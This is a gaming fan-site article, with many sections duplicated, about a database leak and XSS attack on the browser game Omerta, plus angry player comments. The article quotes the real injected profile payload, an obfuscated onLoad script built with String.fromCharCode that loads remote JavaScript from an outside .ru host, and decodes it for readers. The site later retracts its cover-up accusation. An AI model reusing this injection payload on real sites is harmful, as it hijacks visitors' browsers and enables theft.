» Menu
» OB/Site News
» Articles
» Barafranca News
No news found. Reset in progress?
 |
|
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.
Barafranca News: Connection problems - fixed
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Barafranca News: Connection problems - fixed
By Brando: There was a hardware problem which was solved by switching that machine off.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)
Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Im in a train (10:33:37 - 28-09)
Gline'ing them? rofl. how sad brando. you are having your period?
Anonymous (10:29:18 - 28-09)
looks like the office cant handle the truth.. doesnt know how to act.. and starts acting noobish with banning ppl from their servers instead of acting professional ald post an ews post how big their fail is in this one.
How does office think gamers will trust them again after simply LIE to their gamers.
Ridicilous but they should think some more before they act (i wonder if they can think at the office)
Brando your very wrong there.
And u are taking care of shut up everyojne about it..ppl ask everywhere but all u do is remove their questions or not open topics for reply.
Omerta gamers where busy with organising a strike weeks ago. they stopped cause it looked omerta started to act different.... i do hope they start over the plannings now so u FEEL how to act..
You dont wanna learn it the normal way so i hope gamers show it to u that way with a strike.
How does office think gamers will trust them again after simply LIE to their gamers.
Ridicilous but they should think some more before they act (i wonder if they can think at the office)
Brando your very wrong there.
And u are taking care of shut up everyojne about it..ppl ask everywhere but all u do is remove their questions or not open topics for reply.
Omerta gamers where busy with organising a strike weeks ago. they stopped cause it looked omerta started to act different.... i do hope they start over the plannings now so u FEEL how to act..
You dont wanna learn it the normal way so i hope gamers show it to u that way with a strike.
Anonymous (10:05:21 - 28-09)
Lmao Brando. G-lines rly ? Ur more of a kiddo then I thought. You can't run a company a are full of lies. Keep honor to ur self and resign or sell too ppl that are competent to make this game ad it should be cause it has potential! Xx
Danny at 08:57:04 on 28/09:
I didnt get glined because you removed me as moderator here, I feel so cool
I didnt get glined because you removed me as moderator here, I feel so cool
You should have been more active!
I didnt get glined because you removed me as moderator here, I feel so cool
Rix at 08:47:43 on 28/09:
Yea. Check your email please xd
I also sent an email to brando@bara, hope that's the correct one. I wish he had just read my comment here -_-'
Kyra at 08:41:42 on 28/09:
Rix are u g-lined too? :')
Rix are u g-lined too? :')
I also sent an email to brando@bara, hope that's the correct one. I wish he had just read my comment here -_-'
Kyra at 08:41:42 on 28/09:
Rix are u g-lined too? :')
Rix are u g-lined too? :')
I also sent an email to brando@bara, hope that's the correct one. I wish he had just read my comment here -_-'
loverboy at 05:19:29 on 28/09:
this is the first article rix doesn't remove flaming reactions bcs by this one he also know somewhere, we got for once the right to be angry on the whole crew for this!
this is the first article rix doesn't remove flaming reactions bcs by this one he also know somewhere, we got for once the right to be angry on the whole crew for this!
Anonymous (08:24:46 - 28-09)
* Quits: ~sbanks ([email protected]) (G-Lined: [#2127] Please contact Steve/Brando)
-ChanServ- #beyond is closed.
Really... what is this bs? Because they posted the article? You think the playerbase shouldn't have been informed their stats + data are compromised? gogo communism?
Brando, you were told days ago you can post your side of the story, also you could have PM'd sbanks/Rix at any time with your side of it, so its not THEIR fault your only reaction till now was some bitching at the reporter...
And how can you still claim its fake anyways?
Your energy would be better spent trying to find competent devs to fix omerta's security problems ;)
-ChanServ- #beyond is closed.
Really... what is this bs? Because they posted the article? You think the playerbase shouldn't have been informed their stats + data are compromised? gogo communism?
Brando, you were told days ago you can post your side of the story, also you could have PM'd sbanks/Rix at any time with your side of it, so its not THEIR fault your only reaction till now was some bitching at the reporter...
And how can you still claim its fake anyways?
Your energy would be better spent trying to find competent devs to fix omerta's security problems ;)
Anonymous (07:57:00 - 28-09)
LOL at this hugo dude and i wont place my name because why ? you know why .... Brando's and others next reply would be
but but but you mr ***** you buy my DC's blah blah blah
next person who puts his name.... but but but your a stupid cheater mr ******* but you can always quote this and aruge the points..... i mean nothing got to do with being a man on a internet forum about a hack LOL no manlyness there :P
to me its not even about the hack anymore its about omerta being in denial and pretty much taking the piss out of us players by telling us bullshit and thinking we are this stupid to just believe it
and even coming to where the is 100% info(teste etc) about the hack and saying its a lie......
Hugo .. you actually getting paid for omertta ? else stfu mate you look like a fool defending crew like this getting paid or not tbh personal info is personal info aint no relation to facebook .... typical answer from someone who would be involved in the game....
who gives a shit if its a 'DONATE" or what its still private information which should never have been given to these 'Parties"
there could be 100 anonymous posts here and all of them would mean more that what you just posted Hugo .... sound like crew lol pussy footing around the actual problem :') whahahah
one day you guys'll learn ;) better hope sooner rather than later :')
but but but you mr ***** you buy my DC's blah blah blah
next person who puts his name.... but but but your a stupid cheater mr ******* but you can always quote this and aruge the points..... i mean nothing got to do with being a man on a internet forum about a hack LOL no manlyness there :P
to me its not even about the hack anymore its about omerta being in denial and pretty much taking the piss out of us players by telling us bullshit and thinking we are this stupid to just believe it
and even coming to where the is 100% info(teste etc) about the hack and saying its a lie......
Hugo .. you actually getting paid for omertta ? else stfu mate you look like a fool defending crew like this getting paid or not tbh personal info is personal info aint no relation to facebook .... typical answer from someone who would be involved in the game....
who gives a shit if its a 'DONATE" or what its still private information which should never have been given to these 'Parties"
there could be 100 anonymous posts here and all of them would mean more that what you just posted Hugo .... sound like crew lol pussy footing around the actual problem :') whahahah
one day you guys'll learn ;) better hope sooner rather than later :')
Anonymous (07:41:10 - 28-09)
I've been plahing this game a long time and dunno who are u are Hugobust, though i see you have a crew profile, so you must be crew - though maybe not as experienced as crew should be.
You totally avoid the issue and go off on a tangent, which im going to ignore and just ask you this one question - if no hack took place, how come my details on that list of testaments was correct ?
Beth
Acidqueen on irc
(forgot my password cos i only posted here once in the past few years, must ask Rix to reset it).
You totally avoid the issue and go off on a tangent, which im going to ignore and just ask you this one question - if no hack took place, how come my details on that list of testaments was correct ?
Beth
Acidqueen on irc
(forgot my password cos i only posted here once in the past few years, must ask Rix to reset it).
loverboy (05:19:29 - 28-09)
Hugobust:
what a kind of reaction is that :') :')
just flaming and talking about other stuff
THIS goes about omerta!
2nd hack in 4 months?
keep deny it... Good job :)
just not capable to run the game like it needs to,
'dc money goes to our servers to improve and protect them'
seems the money stopped somewhere :')
you as admin should take your responsability,
not just flaming and knowing they will flame back,
this is the first article rix doesn't remove flaming reactions bcs by this one he also know somewhere, we got for once the right to be angry on the whole crew for this!
email,passw,stats,phonenumbers all giving free now,
now it's just wait till they got enough stats, so they put them in public, then we can call whole omerta & recieve spam from everywhere bcs our mails/phonenumbers are circulating.
learn some respect Hugobust, and when you make a fault, don't deny :w
what a kind of reaction is that :') :')
just flaming and talking about other stuff
THIS goes about omerta!
2nd hack in 4 months?
keep deny it... Good job :)
just not capable to run the game like it needs to,
'dc money goes to our servers to improve and protect them'
seems the money stopped somewhere :')
you as admin should take your responsability,
not just flaming and knowing they will flame back,
this is the first article rix doesn't remove flaming reactions bcs by this one he also know somewhere, we got for once the right to be angry on the whole crew for this!
email,passw,stats,phonenumbers all giving free now,
now it's just wait till they got enough stats, so they put them in public, then we can call whole omerta & recieve spam from everywhere bcs our mails/phonenumbers are circulating.
learn some respect Hugobust, and when you make a fault, don't deny :w
Brando, a few days ago someone killed me as LC on omerta. I had no cash at all but the killer knew not only my testament, he also knew that I had 850 mil in my bank account. After I got killed a few weeks ago I deliberately kept my name unknown and because of that I didn't even sign on the rip forums of plenty of my friends, but because of this database leak people know all the top money accounts and their testaments, bullet counts, they know family successors, you can know whatever you care to find out.
And what happens other than getting killed and losing money? Nothing, because just like the hack 2 months ago you will deny everything and I lose money I was saving this entire version.
And what happens other than getting killed and losing money? Nothing, because just like the hack 2 months ago you will deny everything and I lose money I was saving this entire version.
Anonymous (00:55:40 - 28-09)
Moron Brando;
you toldi its fake .. and you expected us to believe you ..
so tell us what the fuck is this ???
you toldi its fake .. and you expected us to believe you ..
so tell us what the fuck is this ???
Hugobost, the problem which could arise now, and could have arisen in those other hacks as well, is that 3rd parties, aka parties we did not agree with in any way to share with, now could have our personal data such as emails and hashed passwords (but hashed in MD5 which is easily crackable and has been so since 2005, seriously why are you still using this shit?).
Anonymous (21:54:25 - 27-09)
Hugobust at 21:29:33 on 27/09:
Facebook also got all your private data, so your argument is invalid.
Facebook also got all your private data, so your argument is invalid.
What kind of fucked up type of reasoning is that?
And you are supposed to be some crew helper or something?
Jesus christ.
Hugobust at 21:42:35 on 27/09:
And to all the anonymous flamers, be a man and post things under your own name so people can argue with you about your points.
Also lets get this money issue strait because most people seem to have forgotten the definition of DONATION code.
"A donation is a gift given by physical or legal persons, typically for charitable purposes and/or to benefit a cause."
If you dont think omerta deserves a donation, then dont donate. Dont whine about the donation codes being the main financial source of omerta or what so ever.
If you want to be part of the financial part of omerta, join the crew and share your ideas. If not so.
Stfu & Gtfo
If you want to discuss my point of view i can be found in all official omerta channels on IRC on this nickname
Kind regards,
Hugobust
And to all the anonymous flamers, be a man and post things under your own name so people can argue with you about your points.
Also lets get this money issue strait because most people seem to have forgotten the definition of DONATION code.
"A donation is a gift given by physical or legal persons, typically for charitable purposes and/or to benefit a cause."
If you dont think omerta deserves a donation, then dont donate. Dont whine about the donation codes being the main financial source of omerta or what so ever.
If you want to be part of the financial part of omerta, join the crew and share your ideas. If not so.
Stfu & Gtfo
If you want to discuss my point of view i can be found in all official omerta channels on IRC on this nickname
Kind regards,
Hugobust
You proved my point, you as a crew representative since you claim you are one, are once again ignoring the issue at hand.
And me posting Anonymous here is a choice, since actually putting a name to the post might hold some value to some it also sways the discussion to a person vs person relation, rather then an argument vs an argument. And you already proved me wright on that, you didnt address a single point mentioned. You only come up with 'well dont donate if you dont like it' and 'join us if you think you know it better!'
Do you really think your opinion holds any weight in Hull? Really?
We as a playerbase prolly have more influence then some dick that never found a fam that was succesfull at anything and decided to join the crew and now thinks he's god.
Or do you just dont know what really happend, and you try and disguise that by posting some standard bs and act as a crew guardian?
Prove me wrong, address the points mentioned in this topic, all of em.
Untill then your nothing more then just another voice thats trying to defend something he cant defend, because you obviously know jack shit.
Your whole facebook statement clearly shows that.
Anonymous (21:45:53 - 27-09)
@hugoborst,
what you expect ? this is 2nd time omerta got hacked and they got all our shit. And this cunt Brando telling it aint true :') i mean wtf :? what you expect ?
what you expect ? this is 2nd time omerta got hacked and they got all our shit. And this cunt Brando telling it aint true :') i mean wtf :? what you expect ?
Hugobust (21:42:35 - 27-09)
And to all the anonymous flamers, be a man and post things under your own name so people can argue with you about your points.
Also lets get this money issue strait because most people seem to have forgotten the definition of DONATION code.
"A donation is a gift given by physical or legal persons, typically for charitable purposes and/or to benefit a cause."
If you dont think omerta deserves a donation, then dont donate. Dont whine about the donation codes being the main financial source of omerta or what so ever.
If you want to be part of the financial part of omerta, join the crew and share your ideas. If not so.
Stfu & Gtfo
If you want to discuss my point of view i can be found in all official omerta channels on IRC on this nickname
Kind regards,
Hugobust
Also lets get this money issue strait because most people seem to have forgotten the definition of DONATION code.
"A donation is a gift given by physical or legal persons, typically for charitable purposes and/or to benefit a cause."
If you dont think omerta deserves a donation, then dont donate. Dont whine about the donation codes being the main financial source of omerta or what so ever.
If you want to be part of the financial part of omerta, join the crew and share your ideas. If not so.
Stfu & Gtfo
If you want to discuss my point of view i can be found in all official omerta channels on IRC on this nickname
Kind regards,
Hugobust
Hugobust at 21:29:33 on 27/09:
Facebook also got all your private data, so your argument is invalid.
Facebook also got all your private data, so your argument is invalid.
Oh, and I don't have Facebook, this being one of the reasons.